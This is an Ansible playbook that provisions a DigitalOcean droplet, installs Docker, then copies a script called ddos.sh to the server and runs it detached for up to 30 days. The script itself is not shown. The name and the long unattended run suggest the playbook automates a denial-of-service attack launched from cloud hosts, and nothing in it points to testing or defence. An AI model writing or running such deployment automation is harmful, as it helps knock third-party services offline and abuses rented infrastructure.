---
- name: Create droplet and establish communication
  hosts: localhost ansible_connection=local
  roles:
    - do_create_droplet

- hosts: do
  remote_user: root
  roles:
    - security_update
  tasks:

    - name: add an apt signing key
      apt_key:
        url: https://download.docker.com/linux/ubuntu/gpg
        state: present

    - name: add docker-ce repo
      apt_repository:
        repo: deb https://download.docker.com/linux/ubuntu bionic stable
        state: present
        update_cache: true

    - name: install docker
      apt:
        name: "{{ item }}"
        state: present
        update_cache: true
      loop:
        - apt-transport-https
        - ca-certificates
        - curl
        - software-properties-common
        - containerd.io
        - docker-ce-cli
        - docker-ce

    - name: copy script
      copy:
        src: ddos.sh
        dest: ~/ddos.sh
        mode: '0744'

    - name: execute script
      shell: ./ddos.sh
      async: 2592000
      poll: 0
